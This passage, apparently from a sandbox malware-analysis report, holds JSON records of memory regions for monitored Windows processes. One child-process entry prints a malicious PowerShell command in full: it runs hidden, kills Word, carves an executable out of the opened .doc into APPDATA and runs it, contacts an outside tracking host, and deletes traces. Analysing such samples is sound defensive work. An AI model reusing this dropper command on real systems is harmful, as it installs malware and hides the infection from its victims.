"permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 11915264, "start_va": 8791249059840, "type": "region", "version": 1 }, "end_va": 8791260975103, "entry_point": 8791249059840, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Management.A#\\009a09f5b2322bb8c5520dc5ddbb28bb\\System.Management.Automation.ni.dll", "id": "region_1727", "name": "system.management.automation.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.management.a#\\009a09f5b2322bb8c5520dc5ddbb28bb\\system.management.automation.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791249059840, "timestamp": "00:01:11.743", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001728-addr_0x000007ff00160000-size_0x0000000000010000-perm_.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_320", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791799496704, "type": "region", "version": 1 }, "end_va": 8791799562239, "entry_point": 0, "filename": null, "id": "region_1728", "name": "private_0x000007ff00160000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799496704, "timestamp": "00:01:11.744", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12288, "start_va": 30277632, "type": "region", "version": 1 }, "end_va": 30289919, "entry_point": 30277632, "filename": "\\Windows\\System32\\l_intl.nls", "id": "region_1729", "name": "l_intl.nls", "norm_filename": "c:\\windows\\system32\\l_intl.nls", "region_type": "memory_mapped_file", "start_va": 30277632, "timestamp": "00:01:11.862", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 42991616, "type": "region", "version": 1 }, "end_va": 43778047, "entry_point": 42991616, "filename": "\\Windows\\System32\\en-US\\KernelBase.dll.mui", "id": "region_1730", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\system32\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 42991616, "timestamp": "00:01:11.863", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 2006777856, "type": "region", "version": 1 }, "end_va": 2006806527, "entry_point": 2006782060, "filename": "\\Windows\\System32\\psapi.dll", "id": "region_1736", "name": "psapi.dll", "norm_filename": "c:\\windows\\system32\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 2006777856, "timestamp": "00:01:11.975", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001738-addr_0x0000000001d70000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_321", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 30867456, "type": "region", "version": 1 }, "end_va": 30871551, "entry_point": 0, "filename": null, "id": "region_1738", "name": "private_0x0000000001d70000", "norm_filename": null, "region_type": "private_memory", "start_va": 30867456, "timestamp": "00:01:12.111", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20480, "start_va": 35913728, "type": "region", "version": 1 }, "end_va": 35934207, "entry_point": 35913728, "filename": "\\Windows\\assembly\\GAC_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp", "id": "region_1747", "name": "sorttbls.nlp", "norm_filename": "c:\\windows\\assembly\\gac_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp", "region_type": "memory_mapped_file", "start_va": 35913728, "timestamp": "00:01:12.325", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 266240, "start_va": 35979264, "type": "region", "version": 1 }, "end_va": 36245503, "entry_point": 35979264, "filename": "\\Windows\\assembly\\GAC_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp", "id": "region_1748", "name": "sortkey.nlp", "norm_filename": "c:\\windows\\assembly\\gac_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp", "region_type": "memory_mapped_file", "start_va": 35979264, "timestamp": "00:01:12.326", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001749-addr_0x000007ff00170000-size_0x0000000000010000-perm_.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_326", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791799562240, "type": "region", "version": 1 }, "end_va": 8791799627775, "entry_point": 0, "filename": null, "id": "region_1749", "name": "private_0x000007ff00170000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799562240, "timestamp": "00:01:12.327", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 36306944, "type": "region", "version": 1 }, "end_va": 36339711, "entry_point": 36319278, "filename": "\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Runtime\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Runtime.dll", "id": "region_1784", "name": "microsoft.wsman.runtime.dll", "norm_filename": "c:\\windows\\assembly\\gac_msil\\microsoft.wsman.runtime\\1.0.0.0__31bf3856ad364e35\\microsoft.wsman.runtime.dll", "region_type": "memory_mapped_file", "start_va": 36306944, "timestamp": "00:01:16.543", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 41091072, "type": "region", "version": 1 }, "end_va": 41095167, "entry_point": 0, "filename": null, "id": "region_1785", "name": "pagefile_0x0000000002730000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 41091072, "timestamp": "00:01:16.544", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 41156608, "type": "region", "version": 1 }, "end_va": 41160703, "entry_point": 0, "filename": null, "id": "region_1786", "name": "pagefile_0x0000000002740000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 41156608, "timestamp": "00:01:16.544", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001787-addr_0x000000001b7f0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_330", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 461307904, "type": "region", "version": 1 }, "end_va": 462356479, "entry_point": 0, "filename": null, "id": "region_1787", "name": "private_0x000000001b7f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 461307904, "timestamp": "00:01:16.545", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 299008, "start_va": 505610240, "type": "region", "version": 1 }, "end_va": 505909247, "entry_point": 505885368, "filename": "\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", "id": "region_1788", "name": "system.transactions.dll", "norm_filename": "c:\\windows\\assembly\\gac_64\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll", "region_type": "memory_mapped_file", "start_va": 505610240, "timestamp": "00:01:16.545", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 6884820647936, "type": "region", "version": 1 }, "end_va": 6884820688895, "entry_point": 6884820666128, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Culture.dll", "id": "region_1789", "name": "culture.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\culture.dll", "region_type": "memory_mapped_file", "start_va": 6884820647936, "timestamp": "00:01:16.546", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 253952, "start_va": 8791238443008, "type": "region", "version": 1 }, "end_va": 8791238696959, "entry_point": 8791238443008, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\b5a6a5ce3cd3d4dd2b151315c612aeff\\Microsoft.PowerShell.Security.ni.dll", "id": "region_1790", "name": "microsoft.powershell.security.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\b5a6a5ce3cd3d4dd2b151315c612aeff\\microsoft.powershell.security.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791238443008, "timestamp": "00:01:16.546", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1146880, "start_va": 8791239426048, "type": "region", "version": 1 }, "end_va": 8791240572927, "entry_point": 8791239426048, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\9206dc8156588e608d405729c833edc5\\Microsoft.PowerShell.Commands.Management.ni.dll", "id": "region_1791", "name": "microsoft.powershell.commands.management.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\9206dc8156588e608d405729c833edc5\\microsoft.powershell.commands.management.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791239426048, "timestamp": "00:01:16.553", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2187264, "start_va": 8791240605696, "type": "region", "version": 1 }, "end_va": 8791242792959, "entry_point": 8791240605696, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\cdf48153115fc0bb466f37b7dcad9ac5\\Microsoft.PowerShell.Commands.Utility.ni.dll", "id": "region_1792", "name": "microsoft.powershell.commands.utility.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\cdf48153115fc0bb466f37b7dcad9ac5\\microsoft.powershell.commands.utility.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791240605696, "timestamp": "00:01:16.576", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 937984, "start_va": 8791242833920, "type": "region", "version": 1 }, "end_va": 8791243771903, "entry_point": 8791242833920, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Transactions\\051655963f24f9ade08486084c570086\\System.Transactions.ni.dll", "id": "region_1793", "name": "system.transactions.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.transactions\\051655963f24f9ade08486084c570086\\system.transactions.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791242833920, "timestamp": "00:01:16.583", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 696320, "start_va": 8791243816960, "type": "region", "version": 1 }, "end_va": 8791244513279, "entry_point": 8791243816960, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.WSMan.Man#\\8cd73e65058ef6f77f36b62a74ec3344\\Microsoft.WSMan.Management.ni.dll", "id": "region_1794", "name": "microsoft.wsman.management.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.wsman.man#\\8cd73e65058ef6f77f36b62a74ec3344\\microsoft.wsman.management.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791243816960, "timestamp": "00:01:16.583", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 204800, "start_va": 8791244537856, "type": "region", "version": 1 }, "end_va": 8791244742655, "entry_point": 8791244537856, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Configuratio#\\fcf35536476614410e0b0bd0e412199e\\System.Configuration.Install.ni.dll", "id": "region_1795", "name": "system.configuration.install.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.configuratio#\\fcf35536476614410e0b0bd0e412199e\\system.configuration.install.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791244537856, "timestamp": "00:01:16.584", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 430080, "start_va": 8791244800000, "type": "region", "version": 1 }, "end_va": 8791245230079, "entry_point": 8791244800000, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\ec50af274bf7a15fb59ac1f0d353b7ea\\Microsoft.PowerShell.Commands.Diagnostics.ni.dll", "id": "region_1796", "name": "microsoft.powershell.commands.diagnostics.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\ec50af274bf7a15fb59ac1f0d353b7ea\\microsoft.powershell.commands.diagnostics.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791244800000, "timestamp": "00:01:16.585", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 3334144, "start_va": 8791245258752, "type": "region", "version": 1 }, "end_va": 8791248592895, "entry_point": 8791245258752, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Core\\83e2f6909980da7347e7806d8c26670e\\System.Core.ni.dll", "id": "region_1797", "name": "system.core.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.core\\83e2f6909980da7347e7806d8c26670e\\system.core.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791245258752, "timestamp": "00:01:16.585", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 344064, "start_va": 41943040, "type": "region", "version": 1 }, "end_va": 42287103, "entry_point": 41943040, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorrc.dll", "id": "region_1815", "name": "mscorrc.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorrc.dll", "region_type": "memory_mapped_file", "start_va": 41943040, "timestamp": "00:01:17.662", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1658880, "start_va": 8791232741376, "type": "region", "version": 1 }, "end_va": 8791234400255, "entry_point": 8791232741376, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.DirectorySer#\\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\\System.DirectoryServices.ni.dll", "id": "region_1816", "name": "system.directoryservices.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.directoryser#\\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\\system.directoryservices.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791232741376, "timestamp": "00:01:17.664", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1490944, "start_va": 8791234445312, "type": "region", "version": 1 }, "end_va": 8791235936255, "entry_point": 8791234445312, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Management\\c44929bde355680c886f8a52f5e22b81\\System.Management.ni.dll", "id": "region_1817", "name": "system.management.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.management\\c44929bde355680c886f8a52f5e22b81\\system.management.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791234445312, "timestamp": "00:01:17.665", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 6967296, "start_va": 8791283400704, "type": "region", "version": 1 }, "end_va": 8791290367999, "entry_point": 8791283400704, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Xml\\ee795155543768ea67eecddc686a1e9e\\System.Xml.ni.dll", "id": "region_1818", "name": "system.xml.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.xml\\ee795155543768ea67eecddc686a1e9e\\system.xml.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791283400704, "timestamp": "00:01:17.665", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 8791557799936, "type": "region", "version": 1 }, "end_va": 8791557828607, "entry_point": 8791557804448, "filename": "\\Windows\\System32\\shfolder.dll", "id": "region_1819", "name": "shfolder.dll", "norm_filename": "c:\\windows\\system32\\shfolder.dll", "region_type": "memory_mapped_file", "start_va": 8791557799936, "timestamp": "00:01:17.666", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 69632, "start_va": 41156608, "type": "region", "version": 1 }, "end_va": 41226239, "entry_point": 0, "filename": null, "id": "region_1862", "name": "pagefile_0x0000000002740000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 41156608, "timestamp": "00:01:18.802", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Windows\\SYSteM32\\windowspOweRSHeLL\\V1.0\\PoWErSHELL.Exe\" -WindowStyle Hidden Try{$ada=\"\"\"$env:APPDATA\\result.exe\"\"\";$adax=$ada+'x';$f=[System.IO.File]::Create($adax);$tmf=\"\"\"$env:TEMP\\o.tmp\"\"\";taskkill /f /im winword.exe;Function pr{Try{$k=\"\"\"HKCU:\\Software\\Microsoft\\Office\\$wv\\Word\\Resiliency\\StartupItems\\\"\"\";for ($i = 0; $i -lt 10; $i++){$r=[System.Text.Encoding]::Unicode.GetString((gp $k).((gi $k).Property[$i]));if ($r.Contains('.doc')){$i=10;}}$r=$r.Substring($r.indexOf(':\\')-1);$r=$r.Substring(0, $r.IndexOf('.doc')+4);ri -Path \"\"\"HKCU:\\Software\\Microsoft\\Office\\$wv\\Word\\Resiliency\"\"\" -recurse;cp -Path $r -Destination $tmf;$d = (gc $tmf -ReadCount 0 -encoding byte)[985480..1011591];Start-Sleep -s 1;sc $r -encoding byte -Value $d;start winword \"\"\"$r\"\"\";$f = (gc $tmf -ReadCount 0 -encoding byte)[420737..985472];sc $ada -encoding byte -Value $f;& $ada;$wc = New-Object system.Net.WebClient;$ht=$wc.downloadString('http://www.samyrai777m.p-host.in/t/t.php?act=hit');$cd=(Resolve-Path .\\).Path;ri \"\"\"$cd\\*\"\"\" -include http*.pdb, http*.dll, *.cs;}Catch{}};$wv='12.0';pr;$wv='14.0';pr;$wv='15.0';pr;$wv='16.0';pr;Stop-Process -processname powershell;}Catch{exit;}", "filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "id": "proc_10", "image_name": "powershell.exe", "monitor_reason": "child_process", "monitored_id": 10, "origin_monitor_id": 7, "ref_parent_process": { "ref_id": "proc_7", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000010-region_00001463-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_238", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1463", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:08.196", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_1464", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:08.196", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 0, "filename": null, "id": "region_1465", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:01:08.196", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001466-addr_0x0000000000050000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_239", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 851967, "entry_point": 0, "filename": null, "id": "region_1466", "name": "private_0x0000000000050000", "norm_filename": null, "region_type": "private_memory", "start_va": 327680, "timestamp": "00:01:08.196", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2004877312, "type": "region", "version": 1 }, "end_va": 2006618111, "entry_point": 2004877312, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1467", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2004877312, "timestamp": "00:01:08.196", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1468", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:08.197", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001469-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable" ], "ref_process_dump": { "ref_id": "proc_dump_240", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_1469", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:08.197", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 487424, "start_va": 5358419968, "type": "region", "version": 1 }, "end_va": 5358907391, "entry_point": 5358470716, "filename": "\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "id": "region_1470", "name": "powershell.exe", "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "region_type": "memory_mapped_file", "start_va": 5358419968, "timestamp": "00:01:08.197", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 8791792943104, "type": "region", "version": 1 }, "end_va": 8791792947199, "entry_point": 8791792943104, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1471", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 8791792943104, "timestamp": "00:01:08.198", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 8796092694528, "type": "region", "version": 1 }, "end_va": 8796092837887, "entry_point": 0, "filename": null, "id": "region_1472", "name": "pagefile_0x000007fffffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8796092694528, "timestamp": "00:01:08.201", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001473-addr_0x000007fffffdd000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_241", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092878848, "type": "region", "version": 1 }, "end_va": 8796092887039, "entry_point": 0, "filename": null, "id": "region_1473", "name": "private_0x000007fffffdd000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092878848, "timestamp": "00:01:08.201", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001474-addr_0x000007fffffdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_242", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 8796092887040, "type": "region", "version": 1 }, "end_va": 8796092891135, "entry_point": 0, "filename": null, "id": "region_1474", "name": "private_0x000007fffffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092887040, "timestamp": "00:01:08.205", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1527", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:08.626", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1528", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:08.626", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 1273855, "entry_point": 851968, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1529", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 851968, "timestamp": "00:01:08.626", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1339391, "entry_point": 0, "filename": null, "id": "region_1530", "name": "pagefile_0x0000000000140000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1310720, "timestamp": "00:01:08.627", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 1384447, "entry_point": 0, "filename": null, "id": "region_1531", "name": "pagefile_0x0000000000150000", "norm_filename": null, "region_type": 